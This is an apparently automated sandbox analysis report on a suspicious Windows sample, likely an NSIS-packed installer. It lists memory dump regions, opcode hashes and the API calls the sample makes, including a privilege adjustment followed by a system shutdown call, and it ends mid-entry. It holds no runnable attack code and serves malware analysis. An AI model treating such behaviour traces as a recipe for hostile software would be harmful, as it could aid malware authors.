                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 09dcb5025181f9dc1fc415579d3cb40c5cf26a8aa3117044852b83368400dafe
                                                                                                            • Instruction ID: efa70aa1e7f73703a8728f0df526a2462434939149cc12401e5f95aebfafef19
                                                                                                            • Opcode Fuzzy Hash: 09dcb5025181f9dc1fc415579d3cb40c5cf26a8aa3117044852b83368400dafe
                                                                                                            • Instruction Fuzzy Hash: 18D05BF4C1A2858FC7418FA09A156F57B709F47201F1551D7D81963261DB344E14DB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 10c007b6f451d23180729b2ac7bfe65a106140a33698d4e6603ed947b86da06d
                                                                                                            • Instruction ID: d947cece4ed2b5ad9ccf7e4e403522d20ae8478aaa4b3abc3f37720b142938a2
                                                                                                            • Opcode Fuzzy Hash: 10c007b6f451d23180729b2ac7bfe65a106140a33698d4e6603ed947b86da06d
                                                                                                            • Instruction Fuzzy Hash: 44D0C23244C3C44FC602D330EC54498BF265A80200B044569D4060BABBDA76454A8F11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6503f0d77de29cdfdd1015f1c86a9545327da28edd1b7fffde835bba7adeaeb5
                                                                                                            • Instruction ID: 06c448915a72e2827979cc85e780fff6ee6e0f19a78c55af2447e86fc8fc1db3
                                                                                                            • Opcode Fuzzy Hash: 6503f0d77de29cdfdd1015f1c86a9545327da28edd1b7fffde835bba7adeaeb5
                                                                                                            • Instruction Fuzzy Hash: 89D0673BB40018DFCB149F99EC408DDF7B6FB98261B148116E915A3661C6319925DB54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c13e5a65fcd99141925380ea18dab6ce90635bd7794c6f344e055c31f5b4a004
                                                                                                            • Instruction ID: 2c03a168019937d9ca4eaf780481fa742381128d2d9c9c120fbb814b48178a20
                                                                                                            • Opcode Fuzzy Hash: c13e5a65fcd99141925380ea18dab6ce90635bd7794c6f344e055c31f5b4a004
                                                                                                            • Instruction Fuzzy Hash: 8FD0C9709152099BC784DBA4E805AAAB7B8AB47316F4091A9A409632509B715E10D695
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b605b3b2a0108f4df954af50c48039e880b0e4677ca2addaa2ad160472c2b4f4
                                                                                                            • Instruction ID: 9921349f732a029b8d92d473e8610b22f1ccb4705600bcc5fde7f21e5a2d7546
                                                                                                            • Opcode Fuzzy Hash: b605b3b2a0108f4df954af50c48039e880b0e4677ca2addaa2ad160472c2b4f4
                                                                                                            • Instruction Fuzzy Hash: 7FD02E2210E3C00FDB07C3382455188AF610E86100B0941FBE068CB1A28A848A8E83AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d73e3912bebe29fbaa0a5a7f5d3feab2424eeb5b0032d5f4ef49fa78addabcf6
                                                                                                            • Instruction ID: 5d05f3feb418ea326c6035d5422c6c1206193f1dcd3302c209e337e331c1175a
                                                                                                            • Opcode Fuzzy Hash: d73e3912bebe29fbaa0a5a7f5d3feab2424eeb5b0032d5f4ef49fa78addabcf6
                                                                                                            • Instruction Fuzzy Hash: D1C01232255510075614A21CB48449F9A56CDC53617148B76A035CA2284D54998B41A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a8546dfea0a15b1e896375824c43a9b63207b4f7e6c1f6b38152db7c04fcf580
                                                                                                            • Instruction ID: a2bae85ff3e185768e4ad9fae3cb04c8aff91d4abb2eb32c8165e3ec6f6521c8
                                                                                                            • Opcode Fuzzy Hash: a8546dfea0a15b1e896375824c43a9b63207b4f7e6c1f6b38152db7c04fcf580
                                                                                                            • Instruction Fuzzy Hash: F2C08C74015E0A8BE2042FA0BC4CB79B7BAB707313FC82E10F00C028308BBC4414C654
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20bfe499d98ad6730c7716840d38d25e939356e9d22bb99f46e95a9e72a40554
                                                                                                            • Instruction ID: 0584570aff50d4f0ad047522cc150fd92c2e586e19e7592905843f5779aa486d
                                                                                                            • Opcode Fuzzy Hash: 20bfe499d98ad6730c7716840d38d25e939356e9d22bb99f46e95a9e72a40554
                                                                                                            • Instruction Fuzzy Hash: EDC080300443484FC505F775DD45575B76FE7C07007408530A10506B7FDF79599A5F90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bd91b53720e6d38a9dbf905cf110477a21c07bc5941ffaa75001785dd26fc653
                                                                                                            • Instruction ID: a2dd14ef0bc0099b8a547be7d30086d9f33dbb217cb246e3356824003cd1230d
                                                                                                            • Opcode Fuzzy Hash: bd91b53720e6d38a9dbf905cf110477a21c07bc5941ffaa75001785dd26fc653
                                                                                                            • Instruction Fuzzy Hash: A6C08C302A82088FD6009B1DC984A2173ACEF85B04F0018E0F208CFB3ACA26FC008605
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93d2d542ee93e36cbd20863abc07b11239ee418a2c50b99e6ecbaa099de01d0b
                                                                                                            • Instruction ID: d99c2bc6cc317a7c829f44589aae5dc733d39ebf1c09ee9a3b2dc3237c01612b
                                                                                                            • Opcode Fuzzy Hash: 93d2d542ee93e36cbd20863abc07b11239ee418a2c50b99e6ecbaa099de01d0b
                                                                                                            • Instruction Fuzzy Hash: 41B092A2E081C11BDF1393A0DD6D6112EC24BAA79AB1A04CE90490B0F29028C502CF02
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-334447862
                                                                                                            • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00437800,74DF2EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$\*.*
                                                                                                            • API String ID: 2035342205-351390296
                                                                                                            • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                            • API String ID: 0-4051960142
                                                                                                            • Opcode ID: df96991531a758b65e1a6308550c2c9078af7227d1b8124a4784d98cfbb756d2
                                                                                                            • Instruction ID: b13a15890f9622d3536622dc18c86e24b3b468554fdf431b3704496cbd390586
                                                                                                            • Opcode Fuzzy Hash: df96991531a758b65e1a6308550c2c9078af7227d1b8124a4784d98cfbb756d2
                                                                                                            • Instruction Fuzzy Hash: DA328074E01218CFDB54CF65C998B9DBBB2BF89300F1081A9D909AB365DB759E85CF20
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                            • API String ID: 0-4051960142
                                                                                                            • Opcode ID: 4894cc471658bdf02076163e90effae9fd231408368af03eecec7e8697488e8d
                                                                                                            • Instruction ID: fa2bfd1442044dbd1e1820fa6c40267e9623074280ae4400f8ea682f2df4bf86
                                                                                                            • Opcode Fuzzy Hash: 4894cc471658bdf02076163e90effae9fd231408368af03eecec7e8697488e8d
                                                                                                            • Instruction Fuzzy Hash: D7029FB4E002188FDB58CF65C994BDDBBB2BF89300F1081A9D509AB365DB759E85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq
                                                                                                            • API String ID: 0-493797296
                                                                                                            • Opcode ID: cbe85eb7fd2581219109b4fde21a76acda2a3f3cd591e4c0fa59282e638e35b0
                                                                                                            • Instruction ID: 36a4c9b6be266af7b84ae3f08113e75c0be1d8f6a0078b2f5dd2afe65f16e16d
                                                                                                            • Opcode Fuzzy Hash: cbe85eb7fd2581219109b4fde21a76acda2a3f3cd591e4c0fa59282e638e35b0
                                                                                                            • Instruction Fuzzy Hash: 51628B74A01228CFDB64DF65C984BDDBBB2BB89301F1085EAD409AB355DB359E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3aa3ffca62cbfd425e7ac2cf1923482a3f99e41ac5442515b2a3ba64c1bf4ec5
                                                                                                            • Instruction ID: 63fe35f4e8beedf4030751f662c1f3ec60013a73b7c9e21f77207b3f8f3f49b3
                                                                                                            • Opcode Fuzzy Hash: 3aa3ffca62cbfd425e7ac2cf1923482a3f99e41ac5442515b2a3ba64c1bf4ec5
                                                                                                            • Instruction Fuzzy Hash: 17C19078E04218CFDB54DFA5C994B9DBBB2AF89300F2081A9D409BB365DB359A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4c4ddac0ce14ed5236638fdfc5980a1582a391c3656ee26d3aaf5be29cfe701
                                                                                                            • Instruction ID: 424c11093baa32bed34e6c1f6d66f924eff297042960fc585dc3a8901e20ef95
                                                                                                            • Opcode Fuzzy Hash: b4c4ddac0ce14ed5236638fdfc5980a1582a391c3656ee26d3aaf5be29cfe701
                                                                                                            • Instruction Fuzzy Hash: D6C19078E01218CFDB14DFA5C994B9DBBB2BF89300F6081A9D409BB365DB359A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
